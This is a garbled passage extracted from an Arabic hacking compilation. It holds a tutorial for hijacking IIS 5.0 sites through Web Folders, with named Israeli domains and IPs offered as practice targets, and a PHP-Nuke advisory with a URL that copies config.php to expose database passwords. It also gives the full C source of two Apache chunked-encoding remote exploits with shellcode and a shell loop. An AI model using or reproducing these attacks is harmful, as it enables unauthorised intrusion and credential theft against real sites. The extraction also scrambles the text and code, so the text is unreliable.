‫بعض التحميل توجه للمسار الموجود به المفل ثم اكتب‪:‬‬ ‫‪ >---.gcc filenmae.xxx.

com‬‬ ‫‪277‬‬ .‫انتهى‪،،،‬‬ ‫" تمتع بإختراق المواقع السرائيلية مع هذه الثغرة "‬ ‫>منقول من منتديات شبكة الحزم<‬ ‫>الكاتب‪<DeadLine :‬‬ ‫الشرح ‪:‬‬ ‫اوًل الثغره يا أخوان تطبق على سيرفرات ‪:‬‬ ‫‪Microsoft-IIS/5.0 on Windows 2000‬‬ ‫يا أخوان كل مانحتاجه هي اداه بسيطه يقدمها لنا وندوز ‪ 98‬وانني ل اعلم ان كانت النسخ الخرى تمتلك مثل‬ ‫هذه لخاصيه ام ل لنني اعمل على نظامين فقط لينكس ماندريك ووندوز ‪ 98‬فقط ‪:‬‬ ‫الداه هي ‪Web Folders :‬‬ ‫اين نجد هذه الثغره ‪:‬‬ ‫حسنًا سوف نجدها انشاءل في الخطوات التاليه ‪:‬‬ ‫ادخل على ‪My Computer‬‬ ‫ثم ستجدها هناك ليس داخل السي او شيء آخر بل داخل ‪ My Computer‬فقط يعني تكون هي مع السي‬ ‫والدي الى آخره‬ ‫نفتح يا أخون الملف المسمى ‪Web Folders‬‬ ‫ثم سنجد التي ‪:‬‬ ‫‪ Add Web Folder‬حيث هي التي ستكون اداتنا المهمه للختراق‬ ‫نفتح ال ‪: Add Web Folder‬‬ ‫حيث نجد كلمة ‪Type the location to add‬‬ ‫ونرى تحتها مستطيل نقوم بأدخال التي ‪:‬‬ ‫‪/http://hostname.

il/ 212.il‬‬ ‫‪daihatsu-israel.43.199.israwine.co.‫حيث ان ‪ hostname‬هو ايبي الموقع انتبه قلنا ايبي الموقع وليس السم‬ ‫والجميع يعرف كيف يخرج اليبي تبع الموقع وهناك دروس كثيره بخصوص هذا الموضوع‬ ‫وهذه مواقع اسرائيليه للتطيبق حيث انها تعمل على ايبي موحد ‪:‬‬ ‫‪mail.84‬‬ ‫ملحظه ‪ :‬اذا تم طلب ادخال باسوورد ويوزر نيم فأعرف ان الثغره مغلقه‬ ‫او اذا دخلت الى الملفات ولم تجد اي ملف فمعناه ان الثغره مغلقه ايضًا‬ ‫اسئل ال التوفيق والعافيه اللهم امين اللهم امين‪.co.121‬‬ ‫ثم نضغط على كلمة ‪Next :‬‬ ‫وهنا سوف تعمل الداه بتحميل ملفات الموقع وتعطيك خاصية الدمن وهي تحميل وازالة الملفات‬ ‫فبعد ان ينتهي البرنامج من التحميل تظهر لك كلمة ‪finish :‬‬ ‫عندها تذهب الى ال ‪ Web Folder :‬وتجد ملف الموقع هناك ومسمى تحت ايبي الموقع‬ ‫موقع اخر للتطبيق ‪:‬‬ ‫‪http://www.talcar.co.il‬‬ ‫‪daewoo-israel.‬‬ ‫انتهى‪،،،‬‬ ‫‪278‬‬ .co.117.il‬‬ ‫ندخل بالمستطيل الذي تم ذكره ‪:‬‬ ‫‪/http://192.143.

September 24 @ 14:25:58 CDT topic: advisories twlc security divison 24/09/2001 .php&userfile_name=hacked.2 is (bugged Explanation ?Do you need sql password http://www.Php nuke BUGGED :Found by LucisFero and supergate twlc/...txt 279 .net/admin..it allows you to 'cp' any file on ." ‫" ثغرة نيوك‬ <‫>ةةةةة‬ >Arab VireruZ :‫>ةةةةةة‬ : ‫الشرح بالنقليزية‬ twlc: here your 0day from LucisFero and supergate Posted on Monday. is ok while the final 5.0 RC1' (i wonder why a released c.php? upload=1&file=config. Summary This time the bug is really dangerous.txt&wdir=/images/&userfil e=config.the box. or even upload files Systems Affected all the versions ARE vulnerable except '5....php&file_name=hacked.server.

php// . admin.textcols = 85$ .$basedir.php that as everyone knows contain the sql's passwords.server. so i (supergate) .._UPLOADED. so you . this software is used by thousands of people."lastaction = "". (we run something based on it too) i hope that this time the author will reply soon and will release a patch too! as i said before just dont try to be a script kiddie or we simply WONT post anymore this kind of advisories.the admin 'login' page will be prompted just go to http://www...(GraphicAdmin($hlpfile// ."if($cancel) $op="FileManager } (if($upload .com 280 .. $wdir2 ." $userfile_name --> $wdir$ This need a rewrite -------------------------------------> OMG! WE TOTALY // AGREEEEEEEE lmao .php contains this routine .php?sid=421 bugtraq@securityfocus.. and try to dont be a SCRIPT KIDDIE we wrote this advisory to help who runs php nuke . you can even upload files."/"=wdir2$ . -to upload files use FTP :conclusions yet another bug of php nuke.twlc."/"=if(!$wdir) $wdir ..and NOT TO LET YOU HAVE FUN :let me explain you the bug...php// ..()CloseTable// .net/images/hacked.()html_header// .textrows = 20$ .php?op=FileManager .$wdir..can use it anyway Solution we erased the function.. 2 hours before didnt knew php .("include("footer..("Header("Location: admin.i leave you the 'fun' to find all the ways to use it..net/article.twlc.("include("header..... cause we wanted to remove the file manager -anyway but i suggest you to do the same..(basedir = dirname($SCRIPT_FILENAME$ ..exit { that doesnt do a check to see if you are logged as admin or no.net article http://www.()displaydir// .(copy($userfile.$userfile_name .(udir = dirname($PHP_SELF$ . Prolly the funny thing is that who first discovered the bug was LucisFero that.txt and you will see config.(chdir($basedir .fear him and you should too :posted at http://www....

$basedir. ideas.php// .$wdir."/"=wdir2$ .("include("header.php&file_name=hacked." $userfile_name --> $wdir$ This need a rewrite -------------------------------------> OMG! WE TOTALY // AGREEEEEEEE lmao .txt 281 ._UPLOADED.(GraphicAdmin($hlpfile// . cool girls.net (http://www."lastaction = "".php&userfile_name=hacked.(udir = dirname($PHP_SELF$ .()CloseTable// .phpnuke."if($cancel) $op="FileManager } (if($upload .org -good luck http://sourceforge.net supergate@twlc.server.textrows = 20$ .php?op=FileManager .(chdir($basedir . $wdir2 .$userfile_name . bella a tutti eof -=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-= =-=-=-=-=-=-=-=-=-=-= :‫الخطأ البرمجي‬ .(basedir = dirname($SCRIPT_FILENAME$ .-http://www. remember that trojans are :(directed to /dev/null lucisfero@twlc.txt&wdir=/images/&userfil e=config.net/admin. insults..twlc.net/tracker/?group_id=7511 Project: PHP-Nuke Web Portal System and of course mailed to the author of php nuke contacts (bugs.textcols = 85$ .php? upload=1&file=config.()displaydir// .peace out pimps.php// ..()html_header// .(copy($userfile."/"=if(!$wdir) $wdir .net (yes we are patched .exit { -=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-= =-=-=-=-=-=-=-=-=-=-= :‫الثغرة‬ http://www.("include("footer.("Header("Location: admin.

net/admin.txt‬لن تحتاج تحميل ملف‬‫نصي لطبع الملف‬ ‫كما هو موجود بالشرح النقليزي يعني فكر واستنتج ‪ (-:‬ولن بعض المواقع تمنع التحميل الى الموقع الن‬ ‫ما عليك سوى الدخول الى ‪http://server.server.txt‬‬ ‫=‪-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-‬‬ ‫=‪=-=-=-=-=-=-=-=-=-=-‬‬ ‫عمل الثغرة‪:‬‬ ‫=طبع ملف الكونفيج ‪ config.‬‬ ‫انتهى‪،،،‬‬ ‫‪282‬‬ .php‬‬ ‫‪upload=1&file=config.2‬كما يظن البعض‪.txt‬‬ ‫وستجد باس واليوزر التابع لقاعدة بيانات الموقع=‪-‬‬ ‫ملحظات‬ ‫‪ -1‬بدل ‪ server.‫=‪-=-=-=-=-=-=-=Arab VireruZ=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-‬‬ ‫=‪=-=-=-=-=-=-=-=-=-=-‬‬ ‫الثغرة بعد التعديل‬ ‫?‪http://www.php‬الى الملف النصي الموجود ‪ ultramode.com/ultramode.php&userfile_name=ultramode.com/nuke :‬‬ ‫‪ -3‬هذه الثغرة ل تعمل مع اصدار ‪ 5.txt&wdir=/&userfile=co‬‬ ‫‪nfig.com‬بالموقع الراد اختراقه‬ ‫‪ -2‬تأكد من موقع المجلة مثال ‪http://server.php&file_name=ultramode.

‫" ثغرة ‪" Chunked‬‬ ‫>ةةةةة ةة ةةةة‬ ‫‪<angels-bytes‬‬ ‫كلنا سمع بثغره تسمى ‪ Chunked‬لـ ‪ ، Apache‬السبب لعدم تحدث موقع ‪ angels-bytes‬عنها هو‬ ‫أنها أتت قبل إنطلق الموقع ‪ ،‬الن سأضع ‪ ، Retina Apache Chunked Scanner‬وهي أداة‬ ‫تقوم بفحص نطاق من ‪ 254‬عنوان آي بي ‪ ،‬وتظهر لك ما منها مصاب بهذه الثغره‪.‬‬ ‫إذا أردت معالجة هذه الثغره عند وجودها فأنصحك بتنزيل أباتشي ‪ 2.com‬قبل وضعها لكم هنا ((‬ ‫*‪/‬‬ ‫‪*/‬حصلنا عليها من سيكورتي تيم*‪/‬‬ ‫‪include#‬‬ ‫‪include#‬‬ ‫‪include#‬‬ ‫‪include#‬‬ ‫‪include#‬‬ ‫‪include#‬‬ ‫‪include#‬‬ ‫‪include#‬‬ ‫‪include#‬‬ ‫‪283‬‬ .3.39‬فهو الفضل الى الن‬ ‫هذه هي وصلة التنزيل‬ ‫‪http://www.org/dist/httpd/binaries‬‬ ‫أما لمسألة إستثمار هذه الثغره فسوف أضع لكم أفضل أستثمارين‬ ‫الخطأ في أباتشي ‪ 1.0.24‬واعلى إلى ‪ 2‬و من ‪ 2‬إلى ‪ ، dev-2.apache.36‬وهي في الروتين البرمجي الذي‬ ‫يتعامل مع رسائل الخطأ‬ ‫هذان الستثماران تستخدمان من قبل مهاجم بعيد لتسبب طفح محلي في السيرفر المصاب ‪ ،‬مؤديه بذلك إلى‬ ‫إعادة كتابه في الذاكرة ‪ ،‬وبطريقة ما تسمح لتنفيذ كود‬ ‫‪ ))*/‬قد تم تجريبها وإختبارها من قبل ‪ angels-bytes.0.

(define PUT_STRING(s) memcpy(p. b. strlen(s)). b) memset(p. p += n# define SHELLCODE_LOCALPORT_OFF 30# = []char shellcode \x89\\\\xe2\\\\x83\\\\xec\\\\x10\\\\x6a\\\\x10\\\\ "\\\ \\x54\\\\x52\\\\x6a\\\\x00\\\\x6a\\\\x00\\\\xb8 \\\ "\\\x1f\\ \x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\x80\\\\x7a\\\\ "\\\ \\x01\\\\x02\\\\x75\\\\x0b\\\\x66\\\\x81\\\\x7a \\\ "\\\x02\\ \x42\\\\x41\\\\x75\\\\x03\\\\xeb\\\\x0f\\\\x90\\\\ "\\\ \\xff\\\\x44\\\\x24\\\\x04\\\\x81\\\\x7c\\\\x24 \\\ "\\\x04\\ \x00\\\\x01\\\\x00\\\\x00\\\\x75\\\\xda\\\\xc7\\\\ "\\\ \\x44\\\\x24\\\\x08\\\\x00\\\\x00\\\\x00\\\\x00 \\\ "\\\xb8\\ \x5a\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\\xff \\\\ "\\\ \\x44\\\\x24\\\\x08\\\\x83\\\\x7c\\\\x24\\\\x08 \\\ "\\\x03\\ \x75\\\\xee\\\\x68\\\\x0b\\\\x6f\\\\x6b\\\\x0b \\\\ "\\\ \\x81\\\\x34\\\\x24\\\\x01\\\\x00\\\\x00\\\\x01 \\\ "\\\x89\\ 284 .include# include# define EXPLOIT_TIMEOUT 5 /* num seconds to wait before assuming it# /* failed define RET_ADDR_INC 512# define MEMCPY_s1_OWADDR_DELTA -146# define PADSIZE_1 4# define PADSIZE_2 5# define PADSIZE_3 7# define REP_POPULATOR 24# define REP_RET_ADDR 6# define REP_ZERO 36# define REP_SHELLCODE 24# define NOPCOUNT 1024# define NOP 0x41# '\\define PADDING_1 \\'A# '\\define PADDING_2 \\'B# '\\define PADDING_3 \\'C# . n).define PUT_BYTES(n. p += strlen(s# . s.

("\\\printf(\\\" Using targets:\\\\t. *portp . i./apache-scalp 3 127.(printf(\\\"\\\\t%d / %s\\\\n\\\"./apache-scalp 0x8f000 .return -1 { 285 . 0x8f2a6"\\\ } . 0x9011a"\\\ } .1:8080\\\\n printf(\\\" Using bruteforce:\\\\t.3.int i. 0x932ae"\\\ } .u_long retaddr !targets[] = { // hehe..{ OpenBSD 3.{ OpenBSD 3.20\\\".char *type .3.24\\\".----\\\\n .int sock .0.("\\\127. j.{ OpenBSD 3. that say OpenBSD here { .("\\\printf(\\\"\\\\n--. from } (if(argc != 3 .0. i < sizeof(targets)/8.1 x86 / Apache 1.3.{ } ([]int main(int argc. argv[0 .0.1 x86 / Apache 1.24\\\".22\\\".0 x86 / Apache 1.0 x86 / Apache 1.1 x86 / Apache 1.{ OpenBSD 3. yes theo.struct sockaddr_in sin. *p .Potential targets list .1:8080\\\\n .3."\\\xcc\\ } struct .--.3. 0xcf92f"\\\ } . i .20\\\".3.{ OpenBSD 3.\xe2\\\\x6a\\\\x04\\\\x52\\\\x6a\\\\x01\\\\x6a\\\\ "\\\ \\x00\\\\xb8\\\\x04\\\\x00\\\\x00\\\\x00\\\\xcd \\\ "\\\x80\\ \x68\\\\x2f\\\\x73\\\\x68\\\\x00\\\\x68\\\\x2f\\\\ "\\\ \\x62\\\\x69\\\\x6e\\\\x89\\\\xe2\\\\x31\\\\xc0 \\\ "\\\x50\\ \x52\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x52\\\\x50\\\\ "\\\ \\xb8\\\\x3b\\\\x00\\\\x00\\\\x00\\\\xcd\\\\x80\\\ .3.unsigned char buf[512]. 0x90600"\\\ } . lport .0 x86 / Apache 1. progress .{ OpenBSD 3.("\\\printf(\\\"Target ID / Target specification\\\\n (++for(i = 0.u_long retaddr .1 x86 / Apache 1. 0x90600"\\\ } .type .{ OpenBSD 3.int bruteforce.char *hostp. targets[i]. 0x8f0aa"\\\ } . *expbuf.24 #2\\\".0.([printf(\\\"Usage: %s \\\\n\\\". char *argv . owned.--.23\\\".

sin_addr.retaddr += RET_ADDR_INC /* skip invalid return adresses */ .sin_family = AF_INET . 0 .sin_port 286 .(sin. (struct sockaddr *) & from.bruteforce = 0 { else .++retaddr ((else if(memchr(&retaddr.i = retaddr & 0xff (if(i == 0x0a || i == 0x0d .(()srand(getpid ..("\\\printf(\\\"connected!\\\\n /* Setup the local port in our shellcode */ .retaddr = targets[retaddr].(retaddr = strtoul(argv[1]. SIG_IGN } (for(owned = 0.bruteforce = 1 . (struct sockaddr *) & sin. 4) || memchr(&retaddr. NULL.(sock = socket(AF_INET. 0x0a.continue . \\\":\\\")) == NULL .(i = sizeof(from } (if(getsockname(sock.("\\\()perror(\\\"getsockname .. 4 .("\\\ .sin_port = htons(atoi(portp (if(!progress .(lport = ntohs(from.("\\\()perror(\\\"connect .("\\\:"\\\ . 0x0d. 16 } (if(retaddr < sizeof(targets)/8 ."\\\portp = \\\"80 .(signal(SIGPIPE.retaddr .(fflush(stdout } (if(connect(sock.printf(\\\"\\\\n[*] Connecting .. progress = 0. sizeof(sin)) != 0 .(exit(1 { (if(!progress .[hostp = strtok(argv[2 (if((portp = strtok(NULL. SOCK_STREAM. &i) != 0 .s_addr = inet_addr(hostp .sin.((sin.(exit(1 { .

PADDING_3 . sizeof(buf) .expbuf . i < REP_SHELLCODE.p++ = (retaddr >> 8) & 0xff* .("\\\ :"\\\)PUT_STRING } (++for (j = 0.(write(sock.1 . PADSIZE_2 . p .(PUT_BYTES(NOPCOUNT.("\\\PUT_STRING(\\\"Transfer-Encoding: chunked\\\\r\\\\n . expbuf.p++ = retaddr & 0xff* .c\\\\r\\\\n } (++for (i = 0.(PUT_BYTES(PADSIZE_2.progress = 1 287 . sizeof(shellcode) .("\\\-PUT_STRING(\\\"X .p++ = (retaddr >> 24) & 0xff* { . .(snprintf(buf.shellcode[SHELLCODE_LOCALPORT_OFF + 0] = (lport >> 8) & 0xff p = expbuf = malloc(8192 + ((PADSIZE_3 + NOPCOUNT + 1024) * (REP_SHELLCODE PADSIZE_1 + (REP_RET_ADDR * 4) + REP_ZERO + 1024) *)) + . sizeof(buf) .("\\\PUT_STRING(\\\"GET / HTTP/1.("\\\PUT_STRING(\\\"\\\\r\\\\n { } (++for (i = 0.("\\\-PUT_STRING(\\\"X . i < REP_POPULATOR. \\\"\\\\r\\\\n%x\\\\r\\\\n\\\".(PUT_BYTES(REP_ZERO.1 . j < REP_RET_ADDR. NOP .(memcpy(p. \\\"\\\\r\\\\n%x\\\\r\\\\n\\\".++progress (if((progress%70) == 0 . PADDING_2 snprintf(buf. PADDING_1 .(MEMCPY_s1_OWADDR_DELTA .1. i . shellcode.("\\\PUT_STRING(\\\"\\\\r\\\\n { .("\\\ :"\\\)PUT_STRING . j . i .shellcode[SHELLCODE_LOCALPORT_OFF + 1] = lport & 0xff .(PUT_STRING(buf .(PUT_BYTES(PADSIZE_3.p++ = (retaddr >> 16) & 0xff* .1.p += sizeof(shellcode) .(PUT_STRING(buf .1\\\\r\\\\nHost: apache-scalp. 0 .((REP_POPULATOR .(PUT_BYTES(PADSIZE_1..

buf. 74 .expbuf).++owned { .strlen(buf . n 288 ."\\\%u . 0.((memset(buf + strlen(buf). length %u.(FD_SET(sock. \\\"\\\\nok\\\\n\\\". sizeof(buf } (if(select(sock + 1. NULL.(FD_SET(0.('\\putchar((rand()%2)? \\'P\\': \\'p . NULL.tv.((memset(buf. &tv) > 0 } ((if(FD_ISSET(sock.((memset(buf. buf. &fds .('\\. &fds (if((n = read(sock. \\\"uname -a.1)) < 0 . expbuf. localport .(fflush(stdout } (while (1 .'\\)putchar { else .(write(1.("\\\printf(\\\"\\\\nGOBBLE GOBBLE!@#%%)*#\\\\n .tv_sec = EXPLOIT_TIMEOUT . buf. now use 0day OpenBSD local . sizeof(buf) . retaddr sprintf(expbuf. 4) == 0 . &fds.(write(sock. n { } ((if(FD_ISSET(0. \\\"\\\\r[*] Currently using retaddr 0x%lx.(puts(buf (if(bruteforce .fd_set fds .("\\\kernel exploit to gain instant r00t\\\\n . sizeof(buf) . buf.id. strlen(expbuf .((write(sock.(retaddr.tv.(printf(\\\"retaddr 0x%lx did the trick!\\\\n\\\".break } (if(!owned && n >= 4 && memcmp(buf.tv_usec = 0 .(exit(1 .1)) <= 0 .} (if(progress == 1 .(FD_ZERO(&fds .int n . (unsigned int)(p . 0.struct timeval tv . &fds (if((n = read(0. sizeof(buf sprintf(buf.echo hehe. \\' \\'. lport . &fds .

c\\\" /* The Host: field# define DEFAULT_CMDZ \\\"uname -a.(close(sock (if(owned .return 0 { :Exploit #2 include# include# include# include# include# include# include# include# include# include# include# __ifdef __linux# include# endif# /* define HOST_PARAM \\\"apache-nosejob.("\\\fprintf(stderr. \\\"Ooops.(free(expbuf .return -1 { { . now use another# "\\\bug/backdoor/feature (hi Theo!) to gain instant r00t\\'.echo \\'hehe..break { . hehehe!\\\\n .{ { (if(!owned .return 0 } (if(!bruteforce .id.\\\\n define RET_ADDR_INC 512# define PADSIZE_1 4# define PADSIZE_2 5# define PADSIZE_3 7# 289 .

b. b) memset(p.define REP_POPULATOR 24# define REP_SHELLCODE 24# define NOPCOUNT 1024# define NOP 0x41# '\\define PADDING_1 \\'A# '\\define PADDING_2 \\'B# '\\define PADDING_3 \\'C# .(define PUT_STRING(s) memcpy(p. strlen(s)). p += strlen(s# . p += n# = []char shellcode \x68\\\\x47\\\\x47\\\\x47\\\\x47\\\\x89\\\\xe3\\\\ "\\\ \\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xc6 \\\ "\\\x04\\\\x24\\ \x04\\\\x53\\\\x50\\\\x50\\\\x31\\\\xd2\\\\x31\\\\ "\\\ \\xc9\\\\xb1\\\\x80\\\\xc1\\\\xe1\\\\x18\\\\xd1 \\\ "\\\xea\\\\x31\\ \xc0\\\\xb0\\\\x85\\\\xcd\\\\x80\\\\x72\\\\x02\\\\ "\\\ \\x09\\\\xca\\\\xff\\\\x44\\\\x24\\\\x04\\\\x80 \\\ "\\\x7c\\\\x24\\ \x04\\\\x20\\\\x75\\\\xe9\\\\x31\\\\xc0\\\\x89\\\\ "\\\ \\x44\\\\x24\\\\x04\\\\xc6\\\\x44\\\\x24\\\\x04 \\\ "\\\x20\\\\x89\\ \x64\\\\x24\\\\x08\\\\x89\\\\x44\\\\x24\\\\x0c\\\\ "\\\ \\x89\\\\x44\\\\x24\\\\x10\\\\x89\\\\x44\\\\x24 \\\ "\\\x14\\\\x89\\ \x54\\\\x24\\\\x18\\\\x8b\\\\x54\\\\x24\\\\x18\\\\ "\\\ \\x89\\\\x14\\\\x24\\\\x31\\\\xc0\\\\xb0\\\\x5d \\\ "\\\xcd\\\\x80\\ \x31\\\\xc9\\\\xd1\\\\x2c\\\\x24\\\\x73\\\\x27\\\\ "\\\ \\x31\\\\xc0\\\\x50\\\\x50\\\\x50\\\\x50\\\\xff \\\ "\\\x04\\\\x24\\ \x54\\\\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\ "\\\ \\xff\\\\x04\\\\x24\\\\xff\\\\x04\\\\x24\\\\x51 \\\ "\\\x50\\\\xb0\\ \x1d\\\\xcd\\\\x80\\\\x58\\\\x58\\\\x58\\\\x58\\\\ "\\\ \\x58\\\\x3c\\\\x4f\\\\x74\\\\x0b\\\\x58\\\\x58\\\ "\\\x41\\\\x80\\ \xf9\\\\x20\\\\x75\\\\xce\\\\xeb\\\\xbd\\\\x90\\\\ "\\\ \\x31\\\\xc0\\\\x50\\\\x51\\\\x50\\\\x31\\\\xc0 \\\ "\\\xb0\\\\x5a\\ \xcd\\\\x80\\\\xff\\\\x44\\\\x24\\\\x08\\\\x80\\\\ "\\\ \\x7c\\\\x24\\\\x08\\\\x03\\\\x75\\\\xef\\\\x31\\\ "\\\xc0\\\\x50\\ \xc6\\\\x04\\\\x24\\\\x0b\\\\x80\\\\x34\\\\x24\\\\ "\\\ \\x01\\\\x68\\\\x42\\\\x4c\\\\x45\\\\x2a\\\\x68 \\\ "\\\x2a\\\\x47\\ \x4f\\\\x42\\\\x89\\\\xe3\\\\xb0\\\\x09\\\\x50\\\\ "\\\ 290 .define PUT_BYTES(n. s. n).

24 #2\\\". 5.5. -146.\\x53\\\\xb0\\\\x01\\\\x50\\\\x50\\\\xb0\\\\x04 \\\ "\\\xcd\\\\x80\\ \x31\\\\xc0\\\\x50\\\\x68\\\\x6e\\\\x2f\\\\x73\\\\ "\\\ \\x68\\\\x68\\\\x2f\\\\x2f\\\\x62\\\\x69\\\\x89 \\\ "\\\xe3\\\\x50\\ \x53\\\\x89\\\\xe1\\\\x50\\\\x51\\\\x53\\\\x50\\\\ "\\\ .{ OpenBSD 3. 36"\\\ } .{ NetBSD 1. 6.1 x86 / Apache 1. 36"\\\ } .1\\\". 6. 0x932ae. 36"\\\ } OpenBSD 3. 6. -90.c\\\\n\\\\n .3.24 PHP 4. 6. 6.23 (Unix)\\\". 36"\\\ } . -90. -90.3. /* and \\\\0\\'z this many times !targets[] = { // hehe. (o)penbsd. /* description for newbie penetrator /* !int delta.5.5.1 x86 / Apache 1. -146.23 (Unix)\\\".23 (Unix)\\\". 0x80efa00.("\\\printf(\\\" -h host[:port]\\\\tHost to penetrate\\\\n .3. 0x80eda00.5. -150.("\\\printf(\\\" \\\\t\\\\t\\\\t(f)reebsd.24 #2\\\". unless -o is used!):\\\\n .3. (n)etbsd\\\\n . -146.("\\\printf(\\\" -t #\\\\t\\\\t\\\\tTarget id.3.("\\\printf(\\\" -o char\\\\t\\\\tDefault values for the following OSes\\\\n . -146. 291 .1 x86 / Apache 1. 0x90600. 6. -146.apache. 6. 6. 0x9011a.("\\\printf(\\\"Usage: . 36"\\\ } .1 x86 / Apache 1. 42 "\\\ } .3./apache-nosejob <-switches> -h host[:80]\\\\n .{ NetBSD 1. 0x90600.3.{ 36 .2. -146. /* delta thingie /* u_long retaddr. /* return address /* int repretaddr.3.("\\\printf(\\\" -b 0x12345678\\\\t\\\\tBase address used for bruteforce\\\\n printf(\\\" \\\\t\\\\t\\\\tTry 0x80000/obsd. 0x80efa00. -90.3.5 x86 / Apache/1.0 x86 / Apache 1.3.{ FreeBSD 4. 36"\\\ } .3. 36"\\\ } . 0x80f3a00.{ OpenBSD 3. 42 "\\\ } . 6. 42"\\\ } . 0x80a7975.0 x86 / Apache 1.24 (Unix)\\\".victim . 42 "\\\ } .{ OpenBSD 3. 36"\\\ } .3.{ } (void usage(void .5.{ OpenBSD 3.24\\\". 5.\\\\n .22\\\". 0x80efa00. 0x80a0000/fbsd.{ OpenBSD 3. 36"\\\ } . 6.{ NetBSD 1. } struct /* char *type.3. 5.2 x86 / Apache 1.{ FreeBSD 4. that say OpenBSD here { . 0x8f2a6. 42 "\\\ } . 0xcfa00.20 (Unix)\\\".5 x86 / Apache/1.2 x86 / Apache 1. -146.{ OpenBSD 3. -90.("\\\nosejob.int i printf(\\\"GOBBLES Security Labs\\\\t\\\\t\\\\t\\\\t\\\\t.1 x86 / Apache 1.3. 0x80efa00. -150.3. /* we repeat retaddr thiz many times in the buffer /* int repzero.20\\\". 0x8f0aa. -146.("\\\printf(\\\" Bruteforcing options (all required. 5.23\\\"."\\\ } . yes theo.0 x86 / Apache 1.0 x86 / Apache 1.3. 36"\\\ } . -146.{ OpenBSD 3.2 x86 / Apache 1.{ OpenBSD 3. 6. 5.22 (Unix)\\\". 0x98a00. 0x1d7a00.12 (Unix)\\\".20\\\".2 x86 / Apache 1.{ NetBSD 1.2 x86 / Apache 1.{ NetBSD 1.24\\\"."\\\xb0\\\\x3b\\\\xcd\\\\x80\\\\xcc \\\ .

-90/nbsd.\\\\n printf(\\\" -z #\\\\t\\\\t\\\\tNumbers of time to repeat \\\\\\\\0 in the . char *argv . targets[i].8lx / %s\\\\n\\\".("\\\HOWTO. *expbuf.Potential targets list . shown_length = 0 . progress.("\\\:"\\\ .char *hostp.--. *p .("\\\replies\\\\n .int responses.("\\\overwrite\\\\n .bruteforce = 0 . 0. i. \\\"t:b:d:h:w:c:r:z:o:\\\")) != -1 } (switch(i /* required stuff */ :'\\case \\'h .("\\\printf(\\\" \\\\t\\\\t\\\\tTry 36 for openbsd/freebsd and 42 for netbsd\\\\n printf(\\\" -r #\\\\t\\\\t\\\\tNumber of times to repeat retadd in the .\\\\n printf(\\\" -d -nnn\\\\t\\\\tmemcpy() delta between s1 and addr to .hostp = strtok(optarg (if((portp = strtok(NULL..("\\\printf(\\\" ID / Return addr / Target specification\\\\n (++for(i = 0. sizeof(victim } (while((i = getopt(argc. *cmdz = DEFAULT_CMDZ .struct sockaddr_in sin.((memset(&victim.struct in_addr ia .(printf(\\\"% 3d / 0x%.()usage .("\\\printf(\\\"\\\\n--.retaddr.("\\\buffer\\\\n . owned.("\\\buffer\\\\n ..("\\\printf(\\\" \\\\t\\\\t\\\\tTry -146/obsd.------------\\\\n .u_char buf[512].--.int i. from .("\\\0x080e0000/nbsd. j.---. sc_timeout = 5 . lport.int bruteforce.type .pdf\\\\n .("\\\printf(\\\" \\\\t\\\\t\\\\tTry 6 for openbsd/freebsd and 5 for netbsd\\\\n . i < sizeof(targets)/sizeof(victim).("\\\printf(\\\" \\\\t\\\\t\\\\taka auto0wncmdz\\\\n printf(\\\"\\\\nExamples will be published in upcoming apache-scalp.------.struct hostent *he (if(argc < 4 . i .("\\\printf(\\\" Optional stuff:\\\\n printf(\\\" -w #\\\\t\\\\t\\\\tMaximum number of seconds to wait for .(exit(1 { } ([]int main(int argc. targets[i]. *portp."\\\portp = \\\"80 292 . argv. sock . \\\":\\\")) == NULL . -150/fbsd.("\\\shellcode reply\\\\n printf(\\\" -c cmdz\\\\t\\\\tCommands to execute when our shellcode .

(victim. .victim.break :'\\case \\'z .repzero = 36 .type = \\\"Custom target .\\\\n\\\"."\\\victim.break :'\\case \\'o ..victim.repzero .break :'\\case \\'r .type = \\\"OpenBSD 293 ."\\\victim.retaddr = 0x80a0000 .(victim.victim.repretaddr = atoi(optarg printf(\\\"Repeating the return address %d times\\\\n\\\".("\\\printf(\\\"Invalid target\\\\n .++bruteforce } (switch(*optarg :'\\case \\'f .victim. NULL.(victim.(printf(\\\"Number of zeroes will be %d\\\\n\\\".retaddr = strtoul(optarg.repretaddr .(victim.++bruteforce . victim.repzero = atoi(optarg .type = \\\"FreeBSD .(printf(\\\"Using %d as delta\\\\n\\\".delta . sizeof(victim .retaddr . &targets[atoi(optarg)]..break /* predefined targets */ :'\\case \\'t } ((if(atoi(optarg) >= sizeof(targets)/sizeof(victim .delta = -150 . .break :'\\case \\'d .(victim.((memcpy(&victim.break :'\\case \\'o .delta = atoi(optarg . 16 printf(\\\"Using 0x%lx as the baseadress while bruteforcing.(victim."\\\victim.repretaddr = 6 .return -1 { . victim.break /* !bruteforce */ :'\\case \\'b .

victim.("\\\style!!)\\\\n .break /* optional stuff */ :'\\case \\'w .break { { } (if(!victim.("\\\ .s_addr = inet_addr(hostp)) == INADDR_ANY .repretaddr || !victim.victim.repzero = 42 .("\\\printf(\\\"[-] Better luck next time!\\\\n ..printf(\\\"[*] Resolving target host .delta = -90 .s_addr.break :'\\case \\'c .(shellcode\\\\n\\\".victim.type = \\\"NetBSD .victim.repzero = 36 . sc_timeout .(fflush(stdout . 4 } (else if((ia.break :default ..break :default .repzero printf(\\\"[-] Incomplete target.(memcpy(&ia.retaddr || !victim.()usage .(printf(\\\"There\\'z no %s on this side of the Net!\\\\n\\\".return -1 { .victim. he->h_addr.break :'\\case \\'n .(sc_timeout = atoi(optarg printf(\\\"Waiting maximum %d seconds for replies from .victim. At least 1 argument is missing (nmap ."\\\victim.delta = -146 .(he = gethostbyname(hostp (if(he .retaddr = 0x80000 .delta || !victim.retaddr = 0x080e0000 .cmdz = optarg .repretaddr = 5 .repretaddr = 6 .victim.break { .victim. hostp 294 .

